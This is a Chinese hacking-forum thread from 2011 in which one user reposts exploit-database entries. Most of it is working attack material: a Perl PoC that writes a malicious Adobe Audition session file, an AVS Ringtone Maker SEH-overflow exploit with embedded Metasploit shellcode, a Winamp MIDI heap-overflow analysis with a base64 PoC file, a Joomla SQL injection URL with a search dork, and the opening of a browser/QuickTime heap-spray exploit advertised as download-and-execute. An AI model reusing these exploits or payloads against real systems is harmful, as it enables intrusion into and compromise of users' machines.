|
 | 作者: DarK-Z [bridex]
 论坛用户 |
登录 |
源代码! [此贴被 DarK-Z(bridex) 在 05月19日20时51分 编辑过] |
| 地主 发表时间: 11-05-19 20:11 |
| 回复: DarK-Z [bridex] 论坛用户 |
登录 |
|
需要E文好的朋友学习! [此贴被 DarK-Z(bridex) 在 05月20日11时00分 编辑过] |
| B1层 发表时间: 11-05-19 20:23 |
| 回复: DarK-Z [bridex] 论坛用户 |
登录 |
|
2011 年的呀 Adobe Audition 3.0 (build 7283) Session File Handling 还有源代码 SEBUG-ID:20546 发布时间:2011-05-12 测试方法: [www.sebug.net] 本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! #!/usr/bin/perl### Adobe Audition 3.0 (build 7283) Session File Handling Buffer Overflow PoC### Vendor: Adobe Sy - SEBUG-ID:20546 发布时间:2011-05-12 测试方法: [www.sebug.net] 本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! #!/usr/bin/perl # # # Adobe Audition 3.0 (build 7283) Session File Handling Buffer Overflow PoC # # # Vendor: Adobe Systems Inc. # Product web page: http://www.adobe.com/products/audition/ # Affected version: 3.0 (build 7238) # # Summary: Recording, mixing, editing, and mastering ― Adobe® Audition® 3 software is the # all-in-one toolset for professional audio production. # # Desc: Adobe Audition suffers from a buffer overflow vulnerability when dealing with .SES # (session) format file. The application failz to sanitize the user input resulting in a # memory corruption, overwriting several memory registers which can aid the atacker to gain # the power of executing arbitrary code or denial of service. # # Tested on Microsoft Windows XP Professional SP3 (English) # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # liquidworm gmail com # Zero Science Lab - http://www.zeroscience.mk # # # http://img225.imageshack.us/img225/9871/boferror.jpg # # # Zero Science Lab Advisory ID: ZSL-2011-5012 # Zero Science Lab Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5012.php # # Adobe Advisory ID: APSB11-10 # Adobe Advisory URL: http://www.adobe.com/support/security/bulletins/apsb11-10.html # # CVE ID: CVE-2011-0614 # # # 18.09.2009 # $data = "\x43\x4F\x4F\x4C\x4E\x45\x53\x53\x50\xF2\x08\x00". "\x68\x64\x72\x20\xF0\x03\x00\x00\x22\x56\x00\x00". "\xFC\x17\x0A\x00\x00\x00\x00\x00\x20\x00\x01\x00". "\x00\x00\x00\x00\x00\x00\xF0\x3F\x00\x00\x00\x00". "\x00\x00\xF0\x3F\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x00"; $FNAME = "Assassin.ses"; print "\n\n[*] Creating malicious session file: $FNAME ...\r\n"; open(ses, ">./$FNAME") || die "\n\aCannot open $FNAME: $!"; print ses "$data"; sleep(1); close (ses); print "\n[*] Malicious session file successfully crafted!\r\n\n"; // sebug.net [2011-05-13] |
| B2层 发表时间: 11-05-19 20:27 |
| 回复: DarK-Z [bridex] 论坛用户 |
登录 |
|
AVS Ringtone Maker 1.6.1 - SEH Overflow Exploit |
| B3层 发表时间: 11-05-19 20:34 |
| 回复: DarK-Z [bridex] 论坛用户 |
登录 |
|
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm KedAns-Dz member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 #!/usr/bin/perl system("cls"); sub logo(){ print q' 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 1 ______ 0 0 .-" "-. 1 1 / KedAns-Dz \ =-=-=-=-=-=-=-=-=-=-=-| 0 0 Algerian HaCker | | > Site : 1337day.com | 1 1 --------------- |, .-. .-. ,| > Twitter : @kedans | 0 0 | )(_o/ \o_)( | > ked-h@hotmail.com | 1 1 |/ /\ \| =-=-=-=-=-=-=-=-=-=-=| 0 0 (@_ (_ ^^ _) HaCkerS-StreeT-Team 1 1 _ ) \_______\__|IIIIII|__/_______________________ 0 0 (_)@8@8{}<________|-\IIIIII/-|________________________> 1 1 )_/ \ / 0 0 (@ `--------` © 2011, Inj3ct0r Team 1 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0 0 AVS Ringtone Maker 1.6.1 - SEH Overflow Exploit 1 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0 '; } logo(); ### # Title : AVS Ringtone Maker 1.6.1 - SEH Overflow Exploit # Author : KedAns-Dz # E-mail : ked-h@hotmail.com | ked-h@exploit-id.com # Home : HMD/AM (30008/04300) - Algeria -(00213555248701) # Web Site : www.1337day.com * www.exploit-id.com * www.09exploit.com # Twitter page : twitter.com/kedans # platform : windows # Tested on : Windows XP sp3 FR ## # Drag And Drop This File to edit Window & Start Upload >> Bo0M CalC ! ### my $junk = "\x41" x 4123 ; # Buffer Junk my $jump = "\xeb\x06\x90\x90"; # Short Jump my $eip = pack("V", 0x00401E3C); # EIP my $seh = pack("V", 0x7C839AC0); # SEH # windows/exec - 511 bytes ( http://www.metasploit.com) # Encoder: x86/alpha_mixed # EXITFUNC=seh, CMD=calc.exe my $shellcode = "\xe8\x52\xe6\xff\xff\x90\x90". "\x56\x54\x58\x36\x33\x30\x56\x58\x48\x34\x39\x48\x48\x48" . "\x50\x68\x59\x41\x41\x51\x68\x5a\x59\x59\x59\x59\x41\x41" . "\x51\x51\x44\x44\x44\x64\x33\x36\x46\x46\x46\x46\x54\x58" . "\x56\x6a\x30\x50\x50\x54\x55\x50\x50\x61\x33\x30\x31\x30" . "\x38\x39\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" . "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41" . "\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42" . "\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x49" . "\x78\x4d\x59\x47\x70\x43\x30\x43\x30\x43\x50\x4e\x69\x49" . "\x75\x46\x51\x4b\x62\x42\x44\x4e\x6b\x46\x32\x46\x50\x4c" . "\x4b\x43\x62\x44\x4c\x4c\x4b\x42\x72\x47\x64\x4e\x6b\x51" . "\x62\x51\x38\x44\x4f\x4e\x57\x43\x7a\x44\x66\x44\x71\x4b" . "\x4f\x45\x61\x49\x50\x4c\x6c\x45\x6c\x43\x51\x51\x6c\x46" . "\x62\x44\x6c\x51\x30\x49\x51\x48\x4f\x44\x4d\x47\x71\x49" . "\x57\x4a\x42\x4c\x30\x42\x72\x50\x57\x4c\x4b\x51\x42\x44" . "\x50\x4c\x4b\x51\x52\x45\x6c\x46\x61\x4e\x30\x4c\x4b\x47" . "\x30\x50\x78\x4d\x55\x49\x50\x42\x54\x43\x7a\x43\x31\x4a" . "\x70\x42\x70\x4c\x4b\x51\x58\x44\x58\x4e\x6b\x50\x58\x45" . "\x70\x46\x61\x4e\x33\x48\x63\x45\x6c\x50\x49\x4c\x4b\x44" . "\x74\x4c\x4b\x46\x61\x49\x46\x46\x51\x4b\x4f\x44\x71\x4f" . "\x30\x4e\x4c\x49\x51\x48\x4f\x44\x4d\x43\x31\x48\x47\x45" . "\x68\x49\x70\x42\x55\x49\x64\x43\x33\x51\x6d\x49\x68\x47" . "\x4b\x43\x4d\x47\x54\x51\x65\x4a\x42\x51\x48\x4c\x4b\x42" . "\x78\x51\x34\x47\x71\x4b\x63\x50\x66\x4c\x4b\x44\x4c\x50" . "\x4b\x4c\x4b\x50\x58\x47\x6c\x43\x31\x4a\x73\x4c\x4b\x43" . "\x34\x4e\x6b\x45\x51\x4a\x70\x4b\x39\x47\x34\x51\x34\x44" . "\x64\x51\x4b\x43\x6b\x43\x51\x46\x39\x50\x5a\x42\x71\x4b" . "\x4f\x4b\x50\x51\x48\x43\x6f\x42\x7a\x4e\x6b\x45\x42\x4a" . "\x4b\x4f\x76\x51\x4d\x50\x6a\x46\x61\x4c\x4d\x4f\x75\x48" . "\x39\x43\x30\x43\x30\x45\x50\x42\x70\x50\x68\x46\x51\x4e" . "\x6b\x42\x4f\x4e\x67\x49\x6f\x4a\x75\x4d\x6b\x49\x6e\x44" . "\x4e\x46\x52\x4a\x4a\x51\x78\x4e\x46\x4a\x35\x4d\x6d\x4f" . "\x6d\x49\x6f\x4a\x75\x45\x6c\x46\x66\x51\x6c\x44\x4a\x4f" . "\x70\x49\x6b\x49\x70\x42\x55\x46\x65\x4f\x4b\x50\x47\x45" . "\x43\x51\x62\x42\x4f\x43\x5a\x43\x30\x42\x73\x49\x6f\x4e" . "\x35\x42\x43\x45\x31\x50\x6c\x51\x73\x44\x6e\x43\x55\x51" . "\x68\x50\x65\x47\x70\x41\x41"; my $exploit = $junk.$jump.$eip.$seh.$shellcode; open (FILE ,'> KedAns.wav'); print FILE $exploit; #================[ Exploited By KedAns-Dz * HST-Dz * ]=========================================== # Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > # + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) # Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * ZoRLu # gunslinger_ * Sn!pEr.S!Te * anT!-Tr0J4n * ^Xecuti0N3r 'www.1337day.com/team' ++ .... # Exploit-Id Team : jos_ali_joe + Caddy-Dz + kaMtiEz (exploit-id.com) ...All * TreX (hotturks.org) # (sec4ever.com) * CEO (0nto.me) * PaCketStorm Team (www.packetstormsecurity.org) # www.metasploit.com * UE-Team (www.09exploit.com) * All Security and Exploits Webs ... #================================================================================================ 我考,图像有点恐! |
| B4层 发表时间: 11-05-19 20:35 |
| 回复: DarK-Z [bridex] 论坛用户 |
登录 |
|
Winamp 5.61 'in_midi' component heap overflow |
| B5层 发表时间: 11-05-19 20:37 |
| 回复: DarK-Z [bridex] 论坛用户 |
登录 |
|
# Exploit Title: Winamp 'in_midi' component heap overflow # Date: 05/14/2011 # Author: Alexander Gavrun (http://0x1byte.blogspot.com/) # Software Link: http://www.winamp.com/ # Version: 5.61 # Tested on: Windows 7 Vulnerability occur while parsing midi file with special crafted System Exclusive message type (event). System exclusive message type, according with midi specification (http://www.gweep.net/~prefect/eng/reference/protocol/midispec.html), begins with 0xF0 and ends with 0xF7 byte (after the data bytes). Processing of this message type begins in sub_766410F function (dissasembled in_midi.dll of winamp v.5.61). ; ..... .text:0766414D loc_766414D: ; CODE XREF: sub_766410F+36 j .text:0766414D add ebx, eax .text:0766414F lea esi, [ebx+edi] .text:07664152 mov al, [esi] ; esi points to message begin .text:07664154 mov [ebp+var_C], ebx .text:07664157 cmp al, 0FFh ; is first byte equal to 0xFF? .text:07664159 jnz loc_7664328 ; ..... .text:07664328 loc_7664328: ; CODE XREF: sub_766410F+4A j .text:07664328 mov edx, 0F0h .text:0766432D mov cl, al .text:0766432F and cl, dl .text:07664331 cmp cl, dl .text:07664333 jnz short loc_7664398 .text:07664335 cmp al, dl .text:07664337 jnz short loc_766438E ; is first byte equal 0xF0 (is SysEx message type?)? .text:07664339 mov eax, [ebp+arg_8] .text:0766433C mov edi, [ebp+var_8] .text:0766433F sub eax, ebx .text:07664341 push eax .text:07664342 mov ecx, esi .text:07664344 mov [ebp+var_10], edi .text:07664347 call sub_766D702 .text:0766434C pop ecx .text:0766434D mov ecx, [ebp+arg_10] .text:07664350 add edi, ecx .text:07664352 push edi .text:07664353 push eax ; SysEx message size, calculated by sub_766D702 .text:07664354 push esi .text:07664355 mov esi, [ebp+arg_0] .text:07664358 mov edi, [esi+30h] .text:0766435B mov [ebp+var_24], eax .text:0766435E call sub_766D894 sub_766D702 function search for 0xF7 byte and count a size of SysEx message. Searching starts from 3rd byte and it means that minimal value, which function might return is 3. ; ..... .text:0766D702 sub_766D702 proc near .text:0766D702 push ebp .text:0766D703 mov ebp, esp .text:0766D705 xor eax, eax .text:0766D707 inc eax ; eax = 1 .text:0766D708 cmp [ebp+arg_0], eax ; arg_0 - MTrk chunk size (readed from midi file) .text:0766D70B jle short loc_766D719 ; jump is not taken .text:0766D70D .text:0766D70D loc_766D70D: ; CODE XREF: sub_766D702+15 j .text:0766D70D inc eax ; eax = 2 .text:0766D70E cmp byte ptr [eax+ecx], 0F7h ; check for 0xF7 byte .text:0766D712 jz short loc_766D731 .text:0766D714 cmp eax, [ebp+arg_0] .text:0766D717 jl short loc_766D70D ; ..... .text:0766D731 loc_766D731: ; CODE XREF: sub_766D702+10 j .text:0766D731 inc eax ; eax = 3 (minimal value that this function might return) .text:0766D732 pop ebp .text:0766D733 retn ; ..... In sub_766D894 check the size of early allocated buffer and reallocate it, if necessary. Then to this buffer copy data of the SysEx message with size obtained by subtraction of offset (to data begin) from SysEx message size. .text:0766D894 sub_766D894 proc near ; CODE XREF: sub_766410F+24F p .text:0766D894 ; ..... .text:0766D8DC loc_766D8DC: ; CODE XREF: sub_766D894+29 j .text:0766D8DC mov eax, [edi] .text:0766D8DE push ebx .text:0766D8DF mov ebx, [edi+14h] .text:0766D8E2 add ebx, [ebp+arg_4] .text:0766D8E5 cmp ebx, eax ; ebx - SysEx massage size, eax - allocated earlier buffer size .text:0766D8E7 jb short loc_766D900 ; jump is taken (to trigger vuln. SysEx message size must be small). ; ..... .text:0766D900 loc_766D900: ; CODE XREF: sub_766D894+53 j .text:0766D900 mov eax, [edi+14h] .text:0766D903 mov ecx, [edi+0Ch] .text:0766D906 mov byte ptr [eax+ecx], 0F0h .text:0766D90A mov eax, [ebp+arg_0] .text:0766D90D inc eax .text:0766D90E push 0FFFFFFFFh .text:0766D910 push eax ; eax - pointer to start of SysEx message plus one .text:0766D911 lea esi, [ebp+var_4] .text:0766D914 call sub_766D734 ; ..... sub_766D734 function calculates offset to data begins by passing all negative values follow by first byte (0xF0). .text:0766D734 sub_766D734 proc near ; ..... .text:0766D734 xor eax, eax .text:0766D736 xor ecx, ecx .text:0766D738 push edi .text:0766D739 .text:0766D739 loc_766D739: ; CODE XREF: sub_766D734+20 j .text:0766D739 cmp eax, [esp+4+arg_4] ; arg_4 = 0xFFFFFFFF, eax = 0 .text:0766D73D jnb short loc_766D75A ; jump is not taken .text:0766D73F mov edx, [esp+4+arg_0] .text:0766D743 mov dl, [eax+edx] ; store byte to dl .text:0766D746 movzx edi, dl .text:0766D749 and edi, 7Fh .text:0766D74C shl ecx, 7 .text:0766D74F inc eax ; counter .text:0766D750 or ecx, edi .text:0766D752 test dl, dl .text:0766D754 js short loc_766D739 ; is stored byte less zero? .text:0766D756 mov [esi], ecx .text:0766D758 pop edi .text:0766D759 retn .text:0766D75A ; --------------------------------------------------------------------------- .text:0766D75A .text:0766D75A loc_766D75A: ; CODE XREF: sub_766D734+9 j .text:0766D75A and dword ptr [esi], 0 .text:0766D75D pop edi .text:0766D75E retn .text:0766D75E sub_766D734 endp Then value, obtained as [SysEx message size] - [offset to data begin] - 1, passed as a Size argument to memcpy function. ; ..... .text:0766D919 mov esi, [ebp+arg_4] .text:0766D91C sub esi, eax .text:0766D91E lea ecx, [esi-1] ; ecx = size - offset - 1 .text:0766D921 push ecx ; Size .text:0766D922 mov ecx, [ebp+arg_0] .text:0766D925 mov [ebp+var_4], eax .text:0766D928 lea eax, [eax+ecx+1] .text:0766D92C mov ecx, [edi+0Ch] .text:0766D92F push eax ; Src .text:0766D930 mov eax, [edi+14h] .text:0766D933 lea eax, [eax+ecx+1] .text:0766D937 push eax ; Dst .text:0766D938 call memcpy Since 0xF7 less than zero, we can construct SysEx message so that offset will be greater (or equal) than size. For an example, the following sequence 0xF0 0xFF 0xF7 0xFF 0xFF ...[data] size = 3 and offset = 4 ecx = 3 - 4 - 1 = 0xFFFFFFFE - very big positive value. After all heap overflow will be occur. POC file (MIME encoded): poc.mid begin TVRoZAAAAAYAAQAQAeBNVHJrAAAAIgDw//f///////9VVVVVVVVVVVVVVVVV VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVQ== POC Available: http://www.exploit-db.com/sploits/17287.poc.mid |
| B6层 发表时间: 11-05-19 20:42 |
| 回复: DarK-Z [bridex] 论坛用户 |
登录 |
|
又是SQL Joomla Component com_versioning SQLi Vulnerability |
| B7层 发表时间: 11-05-19 20:43 |
| 回复: DarK-Z [bridex] 论坛用户 |
登录 |
|
SEBUG-ID:20527 SEBUG-Appdir:Joomla 发布时间:2011-05-09 测试方法: [www.sebug.net] 本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! #[~] Author : the_cyber_nuxbie #[~] Home : www.thecybernuxbie.com #[~] E-mail : staff@thecybernuxbie.com #[~] Found : 09 Mei 2011. #[~] Tested : Windows 7 Ultimate 32bit Bajakan. #[!] Dork : inurl:"com_versioning" ______________________________________________________________ [x] X.P.L: ../public_html/index.php?option=com_versioning§ionid=0&+task=edit&id=[SQLi] <--- Your Skill...!!! - Shout & Greetz: All Member & Staff SekuritiOnline | www.sekuritionline.net All Member & Staff YogyaFamilyCode | www.xcode.or.id All Member & Staff Devilzc0de | www.devilzc0de.org All Member & Staff Hacker-Newbie | www.hacker-newbie.org All Member & Staff ECHO | www.echo.or.id All Member & Staff WhiteCyber | www.whitecyber.net All Member & Staff MuslemHacker | www.muslimhackers.net All Member & Staff BinusHacker | www.binushacker.net All Member & Staff Jasakom | www.jasakom.com All Member & Staff YogyaCarderLink. | www.yogyacarderlink.web.id All Member & Staff IndonesianDefacer | www.indonesiandefacer.org All Member & Staff IndonesianCoder | www.indonesiancoder.com All Member & Staff MagelangCyber | www.magelangcyber.web.id All Member & Staff Jatim-Crew | www.jatimcrew.org All Member & Staff Fast-Hacker | www.fasthacker.org And all forum / community cyber se-antero indonesia. :-D ,etc... Sorry masbro... Aye masih nyubi... :-D Jangan menghina aye donk... :-( Bruakakakakakak... :-D - Mei 09 2011, GMT +09:35 Solo Raya, Indonesia.// sebug.net [2011-05-10] |
| B8层 发表时间: 11-05-19 20:46 |
| 回复: DarK-Z [bridex] 论坛用户 |
登录 |
|
(Firefox & Safari & IE) + QuickTime res://mshtml.dll |
| B9层 发表时间: 11-05-19 20:48 |
| 回复: DarK-Z [bridex] 论坛用户 |
登录 |
|
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm KedAns-Dz member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 <!-- ### # Title : (Firefox & Safari & IE) + QuickTime res://mshtml.dll/ Remote Exploits # Author : KedAns-Dz # E-mail : ked-h@hotmail.com | ked-h@exploit-id.com # Home : HMD/AM (30008/04300) - Algeria -(00213555248701) # Web Site : www.1337day.com * www.exploit-id.com * www.09exploit.com # Twitter page : twitter.com/kedans # platform : Windows # Impact : Remote { Buffer Overflow + Download/Exec File (Tr0j4n3) } # Tested on : Windows XP SP3 Fr (Firefox 4.0 + Safari 4.0.5 & IE7) << QuickTime v7.5.5 ### # (~) Greetings To : Caddy-Dz (+) JaGo-Dz (+) Dr.Ride (+) All My Friends ### --> #=======[ PoC (1) Buffer Overflow & Crash !]============> <html><head> <script src="res://mshtml.dll/objectembed.js"></script> <script language="javascript"> function boom() { var longunistring1 = unescape("%u4141%u4141"); var longunistring2 = unescape("%u4242%u4242"); var longunistring3 = unescape("%u4343%u4343"); var longunistring4 = unescape("%u4444%u4444"); for(i=0; i <= 999 ; ++i) { longunistring1+=longunistring1; longunistring2+=longunistring2; longunistring3+=longunistring3; longunistring4+=longunistring4; document.write(longunistring1); document.write(longunistring2); document.write(longunistring3); document.write(longunistring4); } document.write(longunistring1); document.write(longunistring2); document.write(longunistring3); 